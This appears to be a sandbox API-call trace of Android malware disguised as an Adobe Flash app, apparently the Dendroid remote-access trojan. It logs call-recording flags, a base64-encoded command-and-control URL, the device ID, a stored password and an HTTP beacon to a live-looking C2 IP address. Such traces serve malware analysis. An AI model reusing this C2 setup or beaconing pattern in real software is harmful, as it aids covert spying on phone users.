D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][RecordCalls] [Return][true]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][RecordCalls] [Value][true]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][intercept] [Value][false]
D/S4URC   ( 3739): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][9dd4736125bf4d04]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][9dd4736125bf4d04]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][/storage/sdcard0/System]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][/storage/sdcard0/System]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][/message.php?]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][/message.php?]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3739): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 3981): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/com.adobe.flash13-1/base.apk]
D/S4URC   ( 3981): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/cache]
D/S4URC   ( 3981): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/cache]
D/S4URC   ( 3981): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{com.adobe.flash13/com.connect.Dendroid}]
D/S4URC   ( 3981): [SDK] [android.app.ActivityManager] [getRunningServices]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.BOOT_COMPLETED,android.intent.action.SCREEN_OFF,
D/S4URC   ( 3981): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13]
D/S4URC   ( 3981): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs]
D/S4URC   ( 3981): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml.bak]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][inacall] [Value][0]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Timeout] [Return][10000]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][RecordCalls] [Return][true]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][RecordCalls] [Value][true]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][intercept] [Value][false]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][9dd4736125bf4d04]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][9dd4736125bf4d04]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][/storage/sdcard0/System]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][/storage/sdcard0/System]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][/message.php?]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][/message.php?]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][Start] [Return][false]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][Start] [Value][true]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][Media] [Value][false]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][Files] [Value][false]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][URL] [Value][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][backupURL] [Value][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][password] [Value][cGFzc3dvcmQ=]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][androidId] [Value][9dd4736125bf4d04]
D/S4URC   ( 3981): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.adobe.flash13/shared_prefs/com.adobe.flash13_preferences.xml]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][URL] [Return][aHR0cDovLzI3LjE1OS4xNTkuMjQ5OjkwOTYvRGVuZHJvaWQ=]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][password] [Return][cGFzc3dvcmQ=]
D/S4URC   ( 3981): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLSocketFactoryImpl]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 3981): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 3981): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 3981): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://27.159.159.249:9096/Dendroid/get-functions.php?UID=9dd4736125bf4d04&Password=password]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3981): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.adobe.flash13_preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Timeout] [Return][10000]
D/S4URC   ( 3981): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
